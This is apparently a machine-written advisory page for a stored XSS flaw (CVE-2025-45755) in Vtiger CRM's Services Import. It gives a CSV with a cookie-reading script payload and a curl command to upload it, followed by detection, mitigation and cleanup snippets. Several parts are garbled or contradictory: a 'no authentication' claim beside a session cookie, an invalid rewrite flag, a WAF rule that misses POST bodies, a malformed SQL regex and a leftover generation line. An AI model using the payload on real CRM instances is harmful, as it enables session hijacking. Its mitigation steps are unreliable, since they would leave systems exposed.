Vtiger CRM, Stored Cross-Site Scripting (XSS), CVE-2025-45755 (Critical)

Listen to this Post

How the CVE Works

CVE-2025-45755 is a critical Stored XSS vulnerability in Vtiger CRM Open Source Edition v8.3.0. The flaw arises from improper input sanitization in the Services Import feature. Attackers craft a malicious CSV file with a JavaScript payload embedded in the Service Name field. Upon uploading the file, the payload persists in the database and executes when an administrator views the imported services. This allows session hijacking, phishing, or privilege escalation. The attack requires no authentication if the victim has import privileges.

DailyCVE Form

Platform: Vtiger CRM
Version: 8.3.0
Vulnerability: Stored XSS
Severity: Critical
Date: 06/10/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation

1. Craft Malicious CSV:

Service Name,Description
<script>alert(document.cookie)</script>,Legit Description

2. Upload via Services Import:

curl -F "[email protected]" -H "Cookie: SESSIONID=xxx" http://target/vtiger/service/import

3. Trigger Payload: Admin views services list, executing the script.

Detection

  • Manual Review: Check `modules/Services/actions/Import.php` for lacking htmlspecialchars().
  • Automated Scan:
    nuclei -t xss.yaml -u https://target/vtiger -tags "vtiger,cve-2025-45755"
    

Mitigation

1. Temporary Fix: Disable Services Import via `.htaccess`:

RewriteRule ^vtiger/service/import - [bash]

2. Input Sanitization Patch:

// In modules/Services/actions/Import.php
$serviceName = htmlspecialchars($_POST['name'], ENT_QUOTES, 'UTF-8');

3. WAF Rule:

location ~ /vtiger/service/import {
if ($args ~ "<script") { return 403; }
}

Post-Exploit Analysis

  • Log Review:
    grep "POST /vtiger/service/import" /var/log/apache2/access.log | grep -i ".csv"
    
  • Database Cleanup:
    UPDATE vtiger_service SET servicename = REGEXP_REPLACE(servicename, '<script.?>.?</script>', '');
    

References

No further commentary beyond provided instructions.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top